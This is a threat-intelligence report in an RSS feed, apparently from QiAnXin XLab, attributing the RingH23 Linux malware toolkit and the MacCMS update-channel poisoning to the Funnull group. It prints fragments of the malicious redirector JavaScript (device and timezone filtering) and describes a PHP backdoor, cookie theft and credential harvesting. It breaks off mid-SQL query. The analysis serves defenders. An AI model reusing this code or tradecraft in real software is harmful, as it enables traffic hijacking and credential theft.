<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[奇安信 X 实验室]]></title><description><![CDATA[奇安信 X 实验室]]></description><link>https://blog.xlab.qianxin.com/</link><image><url>https://blog.xlab.qianxin.com/favicon.png</url><title>奇安信 X 实验室</title><link>https://blog.xlab.qianxin.com/</link></image><generator>Ghost 5.70</generator><lastBuildDate>Wed, 11 Mar 2026 21:32:38 GMT</lastBuildDate><atom:link href="https://blog.xlab.qianxin.com/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Funnull Resurfaces: Exposing RingH23 Arsenal and MacCMS Supply Chain Attacks]]></title><description><![CDATA[<h1 id="background">Background</h1>
<p>Funnull (Funnull Technology Inc.), also known as Fangneng CDN, is a Philippines-registered company that publicly claims to provide CDN services. In reality, it has long operated as a key infrastructure provider for Southeast Asia&#x2019;s cybercriminal ecosystem, offering one-stop services for large-scale &#x201C;pig-butchering&#x201D; scam operations. It</p>]]></description><link>https://blog.xlab.qianxin.com/funnull-resurfaces-exposing-ringh23-arsenal-and-maccms-supply-chain-attacks/</link><guid isPermaLink="false">69a40ea2f39f9e0001b252d3</guid><category><![CDATA[FUNNULL]]></category><category><![CDATA[Backdoor]]></category><category><![CDATA[Botnet]]></category><category><![CDATA[EN]]></category><category><![CDATA[Supply Chain]]></category><category><![CDATA[DoH]]></category><dc:creator><![CDATA[Alex.Turing]]></dc:creator><pubDate>Mon, 02 Mar 2026 13:18:19 GMT</pubDate><content:encoded><![CDATA[<h1 id="background">Background</h1>
<p>Funnull (Funnull Technology Inc.), also known as Fangneng CDN, is a Philippines-registered company that publicly claims to provide CDN services. In reality, it has long operated as a key infrastructure provider for Southeast Asia&#x2019;s cybercriminal ecosystem, offering one-stop services for large-scale &#x201C;pig-butchering&#x201D; scam operations. It has been formally designated by the U.S. government as a major cybercrime enabler and is widely referred to in Chinese underground circles as a &#x201C;fraud-dedicated cloud.&#x201D; On May 29, 2025, the U.S. Treasury&#x2019;s Office of Foreign Assets Control (OFAC) announced sanctions against the Funnull group, after which its public operations largely stalled. However, cybercriminal supply chains are highly resilient. Established operators like Funnull often resurface after going dormant. Our latest research suggests that Funnull has re-emerged under a new identity.</p>
<p>The story resumes on July 9, 2025. <strong>XLab&apos;s Cyber Threat Insight and Analysis System(CTIA)</strong> detected that domain <code>download.zhw.sh</code> was distributing an ELF binary with 0 VirusTotal detection. What first jumped out was the image(MD5:5f34cd492c5af9f56f3c38e72320cc49) shown on hxxp://zhw.]sh &#x2014; we couldn&#x2019;t help but think: these guys are unbelievably daring.</p>
<p>More critically, the domain embedded in the sample, <strong>client.110.nz</strong>, showed an astonishing 1.6 billion DNS resolutions within our Passive DNS (PDNS) system.Taken together, these anomalies strongly suggested that we were not looking at an isolated incident &#x2014; but rather at something much bigger.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/turing_180m.png" alt="turing_180m.png" loading="lazy"></p>
<p>We began the analysis with considerable excitement and quickly reached an initial conclusion: the ELF file is a downloader. It attempts to retrieve multiple payloads from a remote server, including <code>udev.sh</code>, <code>udev.rules</code>, <code>module.so</code>, <code>libutilkeybd.so</code>, and <code>ring04h_office_bin</code>. However, due to the absence of a valid session token and group key, we were unable to pass the server-side validation mechanism and therefore could not obtain the subsequent samples.Nevertheless, based on the intended purposes of these payloads &#x2014; such as <code>libutilkeybd.so</code> leveraging the LD_PRELOAD mechanism for hijacking and <code>udev.rules</code> enabling persistence via Udev &#x2014; we are highly confident that the downloader is malicious.</p>
<p>To uncover its true objective, we conducted proactive hunting using the file names as pivots and quickly identified key components: <code>module.so</code> and <code>libutilkeybd.so</code>. One month later, we captured the first <code>ring04h_office_bin</code> sample. The gradual acquisition of these samples allowed us to reconstruct the attack chain.The attackers first compromised a GoEdge management node and implanted an infection module named <code>infection_init</code>. This module then issued SSH remote commands to force all edge nodes to download and execute <code>downloader_init</code>. The <code>downloader_init</code> component &#x2014; the aforementioned downloader &#x2014; subsequently deployed a structured suite of malicious payloads across compromised nodes.</p>
<p>The toolkit exhibits clear modular separation of responsibilities. Based on the recurring string &#x201C;RING04H&#x201D; in samples and the fact that the <code>office_bin</code> module decrypts configuration files using XOR 23, we designated the toolkit <strong>RingH23</strong>. It consists of multiple purpose-built components, including:</p>
<ul>
<li><strong>udev.sh &amp; udev.rules</strong>: Rare Udev-based persistence scripts and rules</li>
<li><strong>module.so (Badnginx2s)</strong>: A malicious Nginx module responsible for traffic hijacking, cryptocurrency wallet replacement, and malicious JavaScript injection</li>
<li><strong>ring04h_office_bin (Badredis2s)</strong>: A backdoor module maintaining long-term node persistence, with C2 hosted on Azure Blob Storage</li>
<li><strong>libutilkeybd.so (Badhide2s)</strong>: A userland rootkit used to conceal payload activity</li>
</ul>
<p>One of the core objectives of this campaign is to inject malicious JavaScript into web pages, hijacking visitors and redirecting them to gambling and pornographic websites. These scripts are hosted on typosquatted domains impersonating major public CDN providers, including:</p>
<ul>
<li><code>code.jquecy[.]com</code> (impersonating jquery.com)</li>
<li><code>cdn.jsdclivr[.]com</code> (impersonating jsdelivr.com)</li>
<li><code>cdnjs.clondflare[.]com</code> (impersonating cloudflare.com)</li>
<li><code>static.bytedauce[.]com</code> (impersonating bytedance.com)</li>
</ul>
<p>These domains were registered in 2025 and according to our telemetry, they have already achieved significant reach. For example, <code>clondflare</code> peaked on August 30, 2025, with 340,000 unique client visits in a single day. It is important to note that our data source covers approximately 5% of the domestic market. Extrapolating proportionally, <code>clondflare</code> may have been accessed &#x2014; actively or passively &#x2014; by an estimated 6.8 million users nationwide on that day alone. The scale of impact is staggering.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_clondflare.png" alt="ring_clondflare.png" loading="lazy"></p>
<p>It is evident that the group behind this campaign is far from an ordinary hacking outfit. Using the malicious JavaScript as a pivot for attribution, we conducted a trace-back analysis and made a striking discovery: the JS code deployed in this operation is virtually identical to the scripts used in the February 2024 Polyfill.io supply-chain attack and the two official GoEdge poisoning incidents in May 2024.The threat actor behind those operations was none other than the notorious <strong>Funnull cybercriminal group</strong>.</p>
<p>As our investigation deepened, we found that Funnull has not ceased its attacks on open-source supply chains and infrastructure providers. Beyond the previously exposed CDN services, the group has expanded its targeting to the CMS ecosystem.We confirmed that the maccms.la edition of MacCMS is leveraging the same malicious JavaScript to conduct stealthy supply-chain poisoning attacks.</p>
<p>Below are the core findings of this research:</p>
<ol>
<li>Funnull Returns &#x2014; Rebranded and Fully Upgraded</li>
</ol>
<p>Funnull is back.This is the same organization behind the 2024 Polyfill.io supply-chain attack, as well as multiple CDN poisoning incidents involving BootCDN, Bootcss, and Staticfile. It is the group publicly named by the U.S. Treasury for facilitating &#x201C;pig-butchering&#x201D; scams, with reported victim losses exceeding $200 million.</p>
<p>Previously, Funnull primarily parasitized existing public CDN services to inject malicious code. Now, it has evolved. The group has developed a fully self-owned, server-side attack framework &#x2014; <strong>RingH23</strong> &#x2014; actively compromising CDN nodes and deploying its own infrastructure. Both its operational control and technical sophistication have reached a new level.</p>
<ol start="2">
<li>Two Independent Infection Vectors</li>
</ol>
<p><code>Path One: GoEdge Management Node Compromise &#x2192; SSH Lateral Propagation &#x2192; RingH23 Deployment</code></p>
<p>Attackers first compromised a GoEdge CDN management node and implanted an infection module. They then used SSH remote commands to forcibly deploy the RingH23 toolkit to all edge nodes.</p>
<p>RingH23 includes multiple specialized components: Badredis2s, Badnginx2s, Badhide2s. This toolkit leverages the rarely abused UDEV mechanism for persistence. The modular structure, clean separation of responsibilities, and engineering maturity clearly indicate a professional black-market development operation &#x2014; not opportunistic script-kiddie activity.</p>
<p><code>Path Two: MACCMS Official Update Channel Poisoning</code></p>
<p>AppleCMS (maccms.la edition) is an open-source video site management system with over 2,700 stars on GitHub and widespread adoption among small and mid-sized streaming site operators in China.Evidence indicates that it has fallen under Funnull&#x2019;s control. We have confirmed that the official update channel distributed malicious PHP backdoors.</p>
<p>The poisoning mechanism is highly deceptive:</p>
<ul>
<li>The payload triggers only upon the administrator&#x2019;s first login after installation.</li>
<li>The download link is valid for just three minutes.</li>
<li>Once retrieved &#x2014; or expired &#x2014; the payload becomes inaccessible.</li>
</ul>
<p>This time-limited design significantly hinders retrospective forensic analysis.</p>
<ol start="3">
<li>CDN1.AI &#x2014; A Highly Suspicious New Infrastructure Layer</li>
</ol>
<p>Domains hosting Funnull&#x2019;s malicious JavaScript have recently migrated en masse to CDN1.AI. CDN1 was created in June 2025 and was rapidly adopted by Funnull&#x2019;s infrastructure. However, its operational hygiene is notably poor &#x2014; even its official website certificate has expired, behavior inconsistent with a legitimate CDN provider.</p>
<p>Given the synchronized migration timing and the rapid trust establishment pattern, we assess with high confidence that CDN1.AI is not an independent third-party CDN, but rather a newly established front infrastructure controlled by Funnull to evade tracking.This suggests the group is actively rebuilding its infrastructure layer.</p>
<ol start="4">
<li>Operational Sophistication: Precision Targeting and Behavioral Profiling</li>
</ol>
<p>The campaign primarily targets mobile users and includes geographic and temporal restrictions (currently triggered only within the China time zone).Hijacking probability varies by time window. For example, between 4:00&#x2013;7:00 AM, the redirection probability reaches as high as 80%, exploiting users&#x2019; late-night fatigue and lowered self-control.</p>
<p>Even more concerning is the attackers&#x2019; profiling strategy. Based on page content keywords, visitors are segmented and redirected differently &#x2014; a targeting model comparable to commercial growth operations.</p>
<ul>
<li>
<p><strong>&#x201C;Low-value traffic&#x201D; (users visiting legitimate content):</strong><br>
Initially redirected to soft-core or borderline content to lower psychological resistance, gradually increasing conversion probability.</p>
</li>
<li>
<p><strong>&#x201C;High-value traffic&#x201D; (users already browsing gray-area content):</strong><br>
Immediately redirected to upstream gambling platforms or high-monetization adult sites to accelerate addiction and maximize revenue extraction.</p>
</li>
</ul>
<p>The level of behavioral segmentation and time-based probability control reflects an industrialized, data-driven criminal operation &#x2014; not random monetization abuse, but structured growth hacking within the underground economy.</p>
<h1 id="million-level-impact-scale">Million-Level Impact Scale</h1>
<p>Based on the existing monitoring data, although it is difficult to precisely quantify the overall infection scale of this cybercriminal campaign, observations from three dimensions &#x2014; infected websites, C2 rankings, and trends in malicious JS access &#x2014; are sufficient to confirm its widespread impact.</p>
<h2 id="0x1-detection-of-infected-websites">0x1: Detection of Infected Websites</h2>
<p>The JS code injected into web pages has highly distinctive characteristics, such as the strings &#x201C;function xxSJRox,&#x201D; &#x201C;MfXKwV,&#x201D; and &#x201C;ptbnNbK.&#x201D; Through asset mapping, we identified 10,748 IP addresses matching these signatures, most of which are streaming or movie-related websites.</p>
<p>It is worth noting that the malicious code is dynamically injected, meaning many actually infected websites may not be detected through asset mapping.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_hunter.png" alt="ring_hunter.png" loading="lazy"></p>
<h2 id="0x2-c2-rankings">0x2: C2 Rankings</h2>
<p>Tranco is a comprehensive ranking system used to measure website popularity, designed to provide more accurate and reliable global website ranking data. It aggregates multiple data sources, including Cisco Umbrella, Majestic, Farsight Security, Cloudflare Radar, and Chrome User Experience Report, and is widely used in academia.</p>
<p>Currently, most of Badredis2s&#x2019; C2 servers rank around 500,000 globally, indicating very high activity levels.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_tranco.png" alt="ring_tranco.png" loading="lazy"></p>
<h2 id="0x3-trend-of-malicious-js-access">0x3: Trend of Malicious JS Access</h2>
<p>During the tracing process, we identified three additional malicious JS hosting sites: bdustatic[.]com, jsdelivr[.]vip, and macoms[.]la.</p>
<p>According to statistical data, the peak number of unique clients per day reached 580,000. Although the number has slightly declined, it currently remains at around 200,000.</p>
<p>Considering the market share of the data source, a conservative estimate suggests that over one million users per day are affected by the illegal sites behind these malicious JS scripts.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_jstrend.png" alt="ring_jstrend.png" loading="lazy"></p>
<h1 id="the-return-of-funnull">The Return of FUNNULL</h1>
<h2 id="0x1-reasons-for-attributing-to-funnull">0x1: Reasons for Attributing to FUNNULL</h2>
<p>Funnull, as an upstream infrastructure provider within the Southeast Asian cybercrime ecosystem, primarily operates by bulk-purchasing clean IP addresses from cloud providers such as Amazon Web Services and Microsoft Azure. It then combines these resources with DGA-generated domains, &#x201C;cleans&#x201D; them, and resells them to downstream fraud groups, thereby supporting pig-butchering scams, fake investment platforms, and similar operations.</p>
<p>However, in multiple CDN poisoning incidents involving polyfill.io, bootcdn.net, and staticfile.org, Funnull did not merely act as a passive supplier. Instead, it directly acquired domains and injected malicious JavaScript code itself. These incidents &#x2014; where the group personally conducted the malicious operations &#x2014; strongly indicate that the poisoning scripts were fully controlled and operated by Funnull.</p>
<p>Because these scripts directly implement core malicious redirection and traffic hijacking functions, maintaining strict control ensures efficient operation of the criminal supply chain, maximizes profit-sharing returns, and avoids efficiency losses or revenue disputes caused by downstream modifications.</p>
<p>Based on this technical inference, we believe that JavaScript script characteristics can serve as a key basis for attack attribution. Funnull&#x2019;s scripts can generally be categorized into two types: JS Loader and JS Redirector. Together, they form a traffic redirection framework. The JS Loader dynamically loads a Redirector payload disguised as a jQuery library, while the Redirector hijacks user requests that meet predefined conditions and redirects them to gambling, pornographic, or other illegal websites.</p>
<h4 id="%E2%91%A0-js-loader">&#x2460; JS Loader</h4>
<p>The core logic of the Loader relies on environment detection and anti-debugging techniques to stealthily load external resources on specific devices. The code conceals the real URL using Base64 encoding and dynamically creates a <code>&lt;script&gt;</code> tag via string concatenation to load a disguised jQuery library. However, execution is limited to non-Mac/Windows platforms (such as mobile devices and Linux systems).</p>
<p>The Loader code captured in this campaign is identical to that used in the 2023 BootCDN poisoning incident, including environment detection logic, decoding function structure, and parameter naming conventions.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_jsloadercmp.png" alt="ring_jsloadercmp.png" loading="lazy"></p>
<p>Additionally, the domain macoms[.]la has appeared in two other attack incidents: the Polyfill supply chain attack and the GoEdge official poisoning incident. The former has been publicly analyzed by multiple security vendors and the community and attributed to Funnull. Although no comprehensive public analysis report is yet available for the latter, based on domain reuse and the consistency of traffic hijacking patterns, we have strong reason to believe that the GoEdge poisoning incident was also carried out by the Funnull group.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_goedge.png" alt="ring_goedge.png" loading="lazy"></p>
<h4 id="%E2%91%A1-js-redirector">&#x2461; JS Redirector</h4>
<p>The core logic of the Redirector is to implement multi-layer detection mechanisms &#x2014; including device type, page keywords, timezone, and access time period &#x2014; and redirect users with varying probabilities at different times of day (e.g., 60%&#x2013;80% hijack probability between 00:00&#x2013;08:00, and 50% during other hours) to specific pornographic, gambling, or scam-related promotional sites, thereby monetizing traffic.</p>
<p>Funnull&#x2019;s Redirector exhibits highly distinctive stylistic traits. It typically filters by device type and primarily targets mobile devices such as smartphones and tablets. Desktop traffic has lower value, lower conversion rates, and is more likely to be detected by administrators or security software, making it less attractive for monetization.</p>
<pre><code>
  var ismobile = navigator.userAgent.match(
  /(phone|pad|pod|iPhone|iPod|ios|iPad
  |Android|Mobile|BlackBerry|IEMobile|
  MQQBrowser|JUC|Fennec|wOSBrowser|
  BrowserNG|WebOS|Symbian|Windows Phone)
  /i);
  
    function isPc() {
    try {
      var _0x32df76 = navigator.platform == &quot;Win32&quot; || 
      navigator.platform == &quot;Windows&quot;;
      var _0x508d68 = navigator.platform == &quot;Mac68K&quot; || 
      navigator.platform == &quot;MacPPC&quot; || 
      navigator.platform == &quot;Macintosh&quot; || 
      navigator.platform == &quot;MacIntel&quot;;
      if (_0x508d68 || _0x32df76) {
        return true;
      } else {
        return false;
      }
    } catch (_0x2decf9) {
      return false;
    }
  }

</code></pre>
<p>Further build an initial user profile based on page content, assess their potential commercial value, and implement differentiated traffic redirection strategies. In simple terms: for &#x201C;proper&#x201D; users, lure them with some pornographic content to gradually erode their mindset and make them easier targets; for &#x201C;less proper&#x201D; users, increase the intensity and extract maximum value.</p>
<h4 id="proper-users-low-value-traffic">Proper Users (Low-Value Traffic)</h4>
<ul>
<li>
<p>Profile: Currently visiting mainstream, normal content pages (no obvious gray/black keywords). These users typically have higher initial vigilance, lower willingness to pay, and longer conversion cycles.</p>
</li>
<li>
<p>Strategy: Prioritize pushing entry-level pornographic, suggestive, or mildly explicit content. By lowering psychological barriers and stimulating curiosity, gradually guide them toward deeper consumption scenarios, ultimately achieving conversion.</p>
</li>
</ul>
<h4 id="less-proper-users-high-value-traffic">Less Proper Users (High-Value Traffic)</h4>
<ul>
<li>
<p>Profile: Currently visiting pornography, gambling, lottery (e.g., Mark Six), adult navigation sites, adult live streaming, etc. (containing numerous related keywords). These users already have explicit demand, stronger willingness to pay, are sensitive to platform capability and content intensity, and have short conversion cycles.</p>
</li>
<li>
<p>Strategy: Directly match them with more upstream, more professional, better-funded, and more stimulating platforms. Provide high-quality content and higher return mechanisms to accelerate user addiction and maximize per-user output (registration, first deposit, continued spending, etc.)</p>
</li>
</ul>
<p>After determining the strategy, dynamically adjust the redirection probability based on the current time period, fully leveraging users&#x2019; psychological states and behavioral characteristics at different times of day to achieve more efficient traffic monetization:</p>
<ul>
<li>
<p>00:00&#x2013;01:59 &#x2013; Redirect probability 60%. Users have just entered late night; vigilance begins to decline, but most are not fully relaxed yet. Suitable for moderate scaling.</p>
</li>
<li>
<p>02:00&#x2013;03:59 &#x2013; Redirect probability 70%. Deep night stage; users&#x2019; decision-making and self-control significantly weaken, impulsive spending increases. A golden window for breaking defenses and driving conversion.</p>
</li>
<li>
<p>04:00&#x2013;06:59 &#x2013; Redirect probability 80%. Early-morning peak; users are fatigued, feel stronger loneliness, and have the lowest vigilance. Acceptance of porn/gambling content and payment impulse reach peak levels. Maximum delivery intensity and highest conversion efficiency.</p>
</li>
<li>
<p>07:00&#x2013;07:59 &#x2013; Redirect probability drops back to 60%. Early morning; users begin to wake up and vigilance rises. Reduce intensity appropriately to avoid disrupting routines and triggering reports or churn.</p>
</li>
<li>
<p>Other times (Daytime 08:00&#x2013;23:59) &#x2013; Base probability 50%. Users are active but more vigilant during the day; maintain moderate delivery probability.</p>
</li>
</ul>
<p>The redirector also includes a time zone detection mechanism. Redirection is triggered only in specific regions. Based on captured samples, it currently targets China only.</p>
<pre><code>    var _0x326fff = _0x1ec843.getHours();
    var _0x16beb8 = Intl.DateTimeFormat().resolvedOptions().timeZone;
    const _0x43a7e6 = [ &quot;Asia/Shanghai&quot;, 
                        &quot;Asia/Chongqing&quot;, 
                        &quot;Asia/Harbin&quot;, 
                        &quot;Asia/Urumqi&quot;, 
                        &quot;Asia/Kashgar&quot;, 
                        &quot;Asia/Beijing&quot;];
    if (_0x43a7e6.includes(_0x16beb8)) { ... }
    
</code></pre>
<p>Even when all the above conditions are met, there is an additional control layer. Funnull designed a remote control switch: by dynamically loading an external JavaScript file to set the usercache variable, redirection is only executed when this variable is true, thereby enabling remote control of the attack behavior.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_checkcache.png" alt="ring_checkcache.png" loading="lazy"></p>
<p>These behaviors are typical characteristics of Funnull Redirector&#x2013;type scripts. The JS scripts captured in this incident are almost identical to samples from previous poisoning campaigns in terms of overall coding style, obfuscation techniques, and core logic design, demonstrating clear family homology. Taking the scripts from the GoEdge incident and the samples delivered by the RingH23 attack kit in this campaign as examples, their stylistic similarities are immediately apparent.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_cpid.png" alt="ring_cpid.png" loading="lazy"></p>
<p>Another more direct piece of evidence is that ailyunoss.com (impersonating Alibaba Cloud), which acted as the remote control switch in this campaign, was registered on April 24, 2025. Its DNS resolution history clearly shows that between May 22 and July 9, 2025, the domain used Funnull CDN services. This discovery directly attributes both the RingH23 attack suite and the active poisoning of the official maccms.la software to the FUNNULL cybercriminal group.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_aily.png" alt="ring_aily.png" loading="lazy"></p>
<h2 id="0x2-suspicious-cdn1ai">0x2: Suspicious cdn1.ai</h2>
<p>The domains used by Funnull to host malicious JavaScript scripts are currently leveraging CDN services based on the cdn1.ai infrastructure. cdn1.ai was created on June 18, 2025. Its official website claims it is a global content delivery network, providing high-speed, stable content acceleration services with over 200 nodes, improving website access speeds by more than 95%.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_cdn1.png" alt="ring_cdn1.png" loading="lazy"></p>
<p>We classified the JS malicious domains based on CNAME records. Historical activity clearly shows the migration from Funnull&#x2019;s own CDN to cdn1.ai.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_old.png" alt="ring_old.png" loading="lazy"></p>
<p>By cross-analyzing the domains involved in this campaign with domains used in past attacks, it can be observed that these domains completed the migration to cdn1.ai within a similar time window (mostly in July).</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_cnamemove.png" alt="ring_cnamemove.png" loading="lazy"></p>
<p>This raises an important question: as an emerging CDN provider, how did CDN1.AI gain the trust of a mature cybercriminal organization like Funnull in such a short period? For Funnull, which generates substantial daily revenue, infrastructure choices are extremely cautious, with high requirements for stability. However, CDN1.AI&#x2019;s performance appears unreliable: its technical architecture is based on the open-source GoEdge project, which is inherently inadequate for professional commercial environments. Furthermore, operational management is not very professional&#x2014;for example, its official website had an expired SSL certificate that was not updated promptly, which clearly does not meet the standard expected of a stable service provider.</p>
<p>Currently, there is no direct evidence linking CDN1.AI to the Funnull group. However, considering its anomalous rapid trust acquisition, sloppy operational management, and migration timing closely synchronized with Funnull&#x2019;s infrastructure, a technical hypothesis can be made: CDN1.AI is likely not a genuine third-party CDN, but a new alias set up by Funnull to evade tracking.</p>
<h1 id="technical-details-of-maccms-poisoning">Technical Details of MacCMS Poisoning</h1>
<p><a href="https://github.com/magicblack/maccms10?ref=blog.xlab.qianxin.com">MacCMS</a> is a professional video content management system based on PHP and MySQL. It is free and open-source and is primarily used to quickly build and manage various video websites, such as movie, TV series, or anime sites. Thanks to its convenient content collection functions and flexible template system, it has been popular among small and medium-sized site operators since its release and is widely used for personal or small-scale commercial video platforms. The original officially maintained version (original website: maccms.com) stopped updating around 2019. Subsequently, a community version called maccms.la began providing updates and support. Its GitHub projects have accumulated over 2,700 stars, reflecting an active community and user recognition.</p>
<p>However, such a widely used project has become involved in a supply-chain security incident. We have clear evidence that the official upgrade channel of maccms.la was used to deliver malicious PHP backdoor code. Once executed on the server, the backdoor further injects malicious JavaScript scripts that hijack front-end pages and manipulate traffic. The technical characteristics of these malicious scripts are highly consistent with the methods used by the FUNNULL group in multiple historical attacks, supporting the industry consensus: maccms.la has effectively been controlled by the FUNNULL group, or acquired by them, and continues to operate as part of their attack infrastructure.</p>
<h2 id="0x1-upgrade-channel-poisoning">0x1: Upgrade Channel Poisoning</h2>
<p>In the maccms GitHub source code, the file <code>application\admin\view_new\index\index.html</code> contains an AJAX snippet that reports version information of maccms, PHP, and ThinkPHP to the remote server (update.maccms.la) to check for updates.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_ajax.png" alt="ring_ajax.png" loading="lazy"></p>
<p>Everything appears normal. However, in practice, we discovered that upon the first login to the admin panel after MACCMS installation, the remote server delivers malicious JS code designed to steal sensitive data and download a malicious PHP payload.</p>
<ul>
<li>post&#xFF1A;Reports sensitive information such as cookies and the admin panel URL to the remote server.</li>
<li>iframe&#xFF1A;Uses a hidden iframe to trigger MACCMS&#x2019;s download mechanism and retrieve the malicious payload.</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_loginrps.png" alt="ring_loginrps.png" loading="lazy"></p>
<p>When the iframe loads the URL specified in its <code>src</code> attribute <code>ADMIN_PATH/admin/update/step1.html?file=laupdc00ecc82ab4b6d060da64d886e97b2c4</code> the browser sends a request to that URL. The backend routing mechanism ultimately invokes the <code>step1()</code> function located in <code>application/admin/controller/Update.php.</code></p>
<p>The core logic of this function is as follows: it receives the file parameter, appends a .zip extension, combines it with a timestamp to generate a complete resource identifier, and then sends a request to a designated remote server to fetch the corresponding file.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_step1.png" alt="ring_step1.png" loading="lazy"></p>
<p>Traffic analysis shows that <code>laupdc00ecc82ab4b6d060da64d886e97b2c4.zip</code> consists of a laupd prefix and a 32-character MD5 string, forming a typical disguised naming scheme. The <code>Date</code> and <code>Last-Modified</code> headers are identical, with a short validity period of only 3 minutes (<code>max-age=180</code>). This indicates that the file is dynamically generated on demand rather than pre-stored. After expiration, access returns &#x201C;access denied,&#x201D; effectively evading forensic retrieval.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_cmsupd.png" alt="ring_cmsupd.png" loading="lazy"></p>
<h2 id="0x2-php-malicious-payload">0x2: PHP Malicious Payload</h2>
<p>After extraction, <code>laupdc00ecc82ab4b6d060da64d886e97b2c4.zip</code> releases <code>application/extra/active.php</code>. Additionally, another malicious PHP payload, addons.php, was discovered in the wild.</p>
<table>
<thead>
<tr>
<th>MD5</th>
<th>PATH</th>
</tr>
</thead>
<tbody>
<tr>
<td>b06b9f13505eb49d6b3f4bddd64b12ce</td>
<td>application/extra/active.php</td>
</tr>
<tr>
<td>eb03db7ac9f10af66a1e2b16185fcadc</td>
<td>application/extra/addons.php</td>
</tr>
</tbody>
</table>
<p>Both payloads are unobfuscated and easy to analyze. Their core purpose is to inject malicious JavaScript into websites, though they use different strategies:</p>
<ul>
<li>addons.php dynamically injects malicious JS before the <code>&lt;/html&gt;</code> tag.</li>
<li>active.php uses a hybrid strategy:Dynamically inserts malicious JS before <code>&lt;/head&gt;</code>. Statically modifies system JS template files by appending malicious code.</li>
</ul>
<p><code>active.php</code> registers a view_filter hook within the ThinkPHP framework, ensuring that all rendered pages automatically trigger the infection process, enabling full traffic monitoring and real-time attacks.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_hook.png" alt="ring_hook.png" loading="lazy"></p>
<p>To reduce exposure, a refined filtering mechanism ensures malicious execution only when:</p>
<ul>
<li>The user accesses via mobile device</li>
<li>The visit originates from an external referrer</li>
<li>The request is not Ajax</li>
<li>Each user is attacked at most once every 10 hours</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_condition.png" alt="ring_condition.png" loading="lazy"></p>
<p>When the conditions are met, the process of tampering with HTML and JS is carried out. First, let&#x2019;s look at the modification of HTML. Its core logic is actually to use the str_replace function to replace $template_marker in the webpage with <code>$template_token.$template_marker</code>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_html.png" alt="ring_html.png" loading="lazy"></p>
<p>Both <code>$template_token</code> and <code>$template_marker</code> are encoded in octal and compressed with gzip. Readers without a PHP environment can use an online PHP Sandbox to view their contents. template_token is malicious JS code, which should look very familiar&#x2014;it is exactly the JS Loader code analyzed in the previous section. Meanwhile, template_marker corresponds to the <code>&lt;\/head&gt;</code> tag.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_htmlflag.png" alt="ring_htmlflag.png" loading="lazy"></p>
<p>Next, let&#x2019;s look at the modification of JS. Its core logic is to use the file_put_contents function to overwrite the original JS file. The malicious JS code, along with a tag in the format /*system_optimization_signature*/, is appended to the end of the JS file. system_optimization_signature serves as the indicator of whether the JS file has been infected. It is the first 12 bytes of the MD5 value of the malicious JS code, specifically <code>138ae887806f</code>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_jsflag.png" alt="ring_jsflag.png" loading="lazy"></p>
<p>Searching for <code>138ae887806f</code> on Google reveals many users discussing this infection. However, users&#x2019; cleanup efforts often remain limited to removing the infected JavaScript files&#x2014;addressing only the surface symptom. The deeper PHP malicious payload, as well as the official poisoning channel of maccms[.]la that serves as a persistent attack source, often goes undetected and unremoved. As a result, websites are repeatedly reinfected with malicious code, falling into a cycle of &#x201C;cleanup&#x2013;reinfection.&#x201D;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_googlejs.png" alt="ring_googlejs.png" loading="lazy"></p>
<h1 id="technical-details-of-ringh23-arsenal">Technical Details of RingH23 Arsenal</h1>
<h2 id="0x1-infectinit">0x1: infect_init</h2>
<p>The basic information of the infection_init component is shown below. It is an infector implemented in Golang and packed using standard UPX.</p>
<pre><code>MD5:65ac2839ab2790b6df8e80022982a2c0
Magic:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped section header size
Packer: UPX
</code></pre>
<p>infect_init must be executed with root privileges. At a minimum, three parameters must be provided: session_token, service_url, and group. The default value of service_url is service.client.110[.]nz.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/ring_infectusage.png" alt="ring_infectusage.png" loading="lazy"></p>
<p>First, it sequentially verifies whether the token and group are valid with the server specified by server_url. Both verifications use the GET method, and the User-Agent is hardcoded as Azure.</p>
<ul>
<li>Token verification request:<br>
The URI used is /api/session/verify, and the specified token is stored in the X-Session header field.</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/ring_session.png" alt="ring_session.png" loading="lazy"></p>
<ul>
<li>Group verification request:<br>
The URI used is /api/client_group/&quot;group&quot;. In the traffic shown below, the group value is j6.</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/ring_group.png" alt="ring_group.png" loading="lazy"></p>
<p>After token and group pass verification, the program traverses the /proc directory to locate the edge-admin process. It then retrieves the database username and password from the process configuration file api_db.yaml, and executes the following SQL query to obtain edge nodes and their login credentials from the database:</p>
<pre><code>SELECT n.id, n.name, n.clusterId, l.type, l.params
